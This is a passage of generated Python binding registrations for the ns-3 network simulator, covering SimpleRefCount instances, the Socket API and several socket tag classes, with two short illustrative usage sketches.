## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount(ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount(ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter< ns3::OutputStreamWrapper > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3PbbAddressBlock_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbAddressBlock__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >::SimpleRefCount(ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter< ns3::PbbAddressBlock > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3PbbMessage_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbMessage__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >::SimpleRefCount(ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter< ns3::PbbMessage > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3PbbPacket_Ns3Header_Ns3DefaultDeleter__lt__ns3PbbPacket__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >::SimpleRefCount(ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter< ns3::PbbPacket > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3PbbTlv_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbTlv__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >::SimpleRefCount(ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter< ns3::PbbTlv > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Socket_methods(root_module, cls):
## socket.h (module 'network'): ns3::Socket::Socket(ns3::Socket const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Socket const &', 'arg0')])
## socket.h (module 'network'): ns3::Socket::Socket() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): int ns3::Socket::Bind(ns3::Address const & address) [member function]
cls.add_method('Bind',
'int',
[param('ns3::Address const &', 'address')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Bind() [member function]
cls.add_method('Bind',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Bind6() [member function]
cls.add_method('Bind6',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::BindToNetDevice(ns3::Ptr<ns3::NetDevice> netdevice) [member function]
cls.add_method('BindToNetDevice',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'netdevice')],
is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Close() [member function]
cls.add_method('Close',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Connect(ns3::Address const & address) [member function]
cls.add_method('Connect',
'int',
[param('ns3::Address const &', 'address')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): static ns3::Ptr<ns3::Socket> ns3::Socket::CreateSocket(ns3::Ptr<ns3::Node> node, ns3::TypeId tid) [member function]
cls.add_method('CreateSocket',
'ns3::Ptr< ns3::Socket >',
[param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::TypeId', 'tid')],
is_static=True)
## socket.h (module 'network'): bool ns3::Socket::GetAllowBroadcast() const [member function]
cls.add_method('GetAllowBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Socket::GetBoundNetDevice() [member function]
cls.add_method('GetBoundNetDevice',
'ns3::Ptr< ns3::NetDevice >',
[])
## socket.h (module 'network'): ns3::Socket::SocketErrno ns3::Socket::GetErrno() const [member function]
cls.add_method('GetErrno',
'ns3::Socket::SocketErrno',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Socket::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::Socket::GetRxAvailable() const [member function]
cls.add_method('GetRxAvailable',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::GetSockName(ns3::Address & address) const [member function]
cls.add_method('GetSockName',
'int',
[param('ns3::Address &', 'address')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Socket::SocketType ns3::Socket::GetSocketType() const [member function]
cls.add_method('GetSocketType',
'ns3::Socket::SocketType',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::Socket::GetTxAvailable() const [member function]
cls.add_method('GetTxAvailable',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::Socket::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): bool ns3::Socket::IsRecvPktInfo() const [member function]
cls.add_method('IsRecvPktInfo',
'bool',
[],
is_const=True)
## socket.h (module 'network'): int ns3::Socket::Listen() [member function]
cls.add_method('Listen',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv(uint32_t maxSize, uint32_t flags) [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv() [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[])
## socket.h (module 'network'): int ns3::Socket::Recv(uint8_t * buf, uint32_t size, uint32_t flags) [member function]
cls.add_method('Recv',
'int',
[param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(uint32_t maxSize, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('ns3::Address &', 'fromAddress')])
## socket.h (module 'network'): int ns3::Socket::RecvFrom(uint8_t * buf, uint32_t size, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'int',
[param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')])
## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p')])
## socket.h (module 'network'): int ns3::Socket::Send(uint8_t const * buf, uint32_t size, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
## socket.h (module 'network'): int ns3::Socket::SendTo(ns3::Ptr<ns3::Packet> p, uint32_t flags, ns3::Address const & toAddress) [member function]
cls.add_method('SendTo',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::SendTo(uint8_t const * buf, uint32_t size, uint32_t flags, ns3::Address const & address) [member function]
cls.add_method('SendTo',
'int',
[param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address const &', 'address')])
## socket.h (module 'network'): void ns3::Socket::SetAcceptCallback(ns3::Callback<bool, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionRequest, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> newConnectionCreated) [member function]
cls.add_method('SetAcceptCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionRequest'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'newConnectionCreated')])
## socket.h (module 'network'): bool ns3::Socket::SetAllowBroadcast(bool allowBroadcast) [member function]
cls.add_method('SetAllowBroadcast',
'bool',
[param('bool', 'allowBroadcast')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::SetCloseCallbacks(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> normalClose, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> errorClose) [member function]
cls.add_method('SetCloseCallbacks',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'normalClose'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'errorClose')])
## socket.h (module 'network'): void ns3::Socket::SetConnectCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionSucceeded, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionFailed) [member function]
cls.add_method('SetConnectCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionSucceeded'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionFailed')])
## socket.h (module 'network'): void ns3::Socket::SetDataSentCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> dataSent) [member function]
cls.add_method('SetDataSentCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'dataSent')])
## socket.h (module 'network'): void ns3::Socket::SetRecvCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> arg0) [member function]
cls.add_method('SetRecvCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'arg0')])
## socket.h (module 'network'): void ns3::Socket::SetRecvPktInfo(bool flag) [member function]
cls.add_method('SetRecvPktInfo',
'void',
[param('bool', 'flag')])
## socket.h (module 'network'): void ns3::Socket::SetSendCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> sendCb) [member function]
cls.add_method('SetSendCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'sendCb')])
## socket.h (module 'network'): int ns3::Socket::ShutdownRecv() [member function]
cls.add_method('ShutdownRecv',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::ShutdownSend() [member function]
cls.add_method('ShutdownSend',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::NotifyConnectionFailed() [member function]
cls.add_method('NotifyConnectionFailed',
'void',
[],
visibility='protected')
## socket.h (module 'network'): bool ns3::Socket::NotifyConnectionRequest(ns3::Address const & from) [member function]
cls.add_method('NotifyConnectionRequest',
'bool',
[param('ns3::Address const &', 'from')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyConnectionSucceeded() [member function]
cls.add_method('NotifyConnectionSucceeded',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyDataRecv() [member function]
cls.add_method('NotifyDataRecv',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyDataSent(uint32_t size) [member function]
cls.add_method('NotifyDataSent',
'void',
[param('uint32_t', 'size')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyErrorClose() [member function]
cls.add_method('NotifyErrorClose',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyNewConnectionCreated(ns3::Ptr<ns3::Socket> socket, ns3::Address const & from) [member function]
cls.add_method('NotifyNewConnectionCreated',
'void',
[param('ns3::Ptr< ns3::Socket >', 'socket'), param('ns3::Address const &', 'from')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyNormalClose() [member function]
cls.add_method('NotifyNormalClose',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifySend(uint32_t spaceAvailable) [member function]
cls.add_method('NotifySend',
'void',
[param('uint32_t', 'spaceAvailable')],
visibility='protected')
return
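## Illustrative sketch (not part of the generated bindings): creating and using a
## Socket via the static CreateSocket registered above. Node is registered elsewhere
## in this module; ns.internet (InternetStackHelper, UdpSocketFactory) belongs to the
## internet-module bindings and is assumed to be built. Passing a plain Python
## callable to SetRecvCallback relies on the generated callback glue accepting it,
## as it does in typical ns-3 Python builds.
def _example_socket_usage():
    import ns.core
    import ns.network
    import ns.internet
    node = ns.network.Node()
    ns.internet.InternetStackHelper().Install(node)     # provides the UDP socket factory
    tid = ns.core.TypeId.LookupByName("ns3::UdpSocketFactory")
    sock = ns.network.Socket.CreateSocket(node, tid)
    sock.Bind()                                         # implemented by the concrete UDP socket
    def on_recv(s):
        s.Recv()                                        # drain whatever arrived
    sock.SetRecvCallback(on_recv)
    return sock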
def register_Ns3SocketAddressTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag(ns3::SocketAddressTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketAddressTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketAddressTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::Address ns3::SocketAddressTag::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_const=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketAddressTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketAddressTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketAddressTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::SetAddress(ns3::Address addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'addr')])
return
def register_Ns3SocketFactory_methods(root_module, cls):
## socket-factory.h (module 'network'): ns3::SocketFactory::SocketFactory(ns3::SocketFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketFactory const &', 'arg0')])
## socket-factory.h (module 'network'): ns3::SocketFactory::SocketFactory() [constructor]
cls.add_constructor([])
## socket-factory.h (module 'network'): ns3::Ptr<ns3::Socket> ns3::SocketFactory::CreateSocket() [member function]
cls.add_method('CreateSocket',
'ns3::Ptr< ns3::Socket >',
[],
is_pure_virtual=True, is_virtual=True)
## socket-factory.h (module 'network'): static ns3::TypeId ns3::SocketFactory::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3SocketIpTtlTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag(ns3::SocketIpTtlTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketIpTtlTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketIpTtlTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketIpTtlTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::SocketIpTtlTag::GetTtl() const [member function]
cls.add_method('GetTtl',
'uint8_t',
[],
is_const=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpTtlTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::SetTtl(uint8_t ttl) [member function]
cls.add_method('SetTtl',
'void',
[param('uint8_t', 'ttl')])
return
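## Illustrative sketch (not part of the generated bindings): attaching the
## SocketIpTtlTag registered above to a packet. Packet's tag API (AddPacketTag /
## PeekPacketTag) is registered elsewhere in this module; ns.network is assumed
## importable.
def _example_socket_ip_ttl_tag_usage():
    import ns.network
    tag = ns.network.SocketIpTtlTag()
    tag.SetTtl(32)
    pkt = ns.network.Packet(64)
    pkt.AddPacketTag(tag)
    copy = ns.network.SocketIpTtlTag()
    found = pkt.PeekPacketTag(copy)       # expected: found is True, copy.GetTtl() == 32
    return found, copy.GetTtl()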
def register_Ns3SocketSetDontFragmentTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag(ns3::SocketSetDontFragmentTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketSetDontFragmentTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Disable() [member function]
cls.add_method('Disable',
'void',
[])
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Enable() [member function]
cls.add_method('Enable',
'void',
[])
## socket.h (module 'network'): ns3::TypeId ns3::SocketSetDontFragmentTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketSetDontFragmentTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketSetDontFragmentTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): bool ns3::SocketSetDontFragmentTag::IsEnabled() const [member function]
cls.add_method('IsEnabled',
'bool',
[],
is_const=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
return
def register_Ns3Time_methods(root_module, cls):
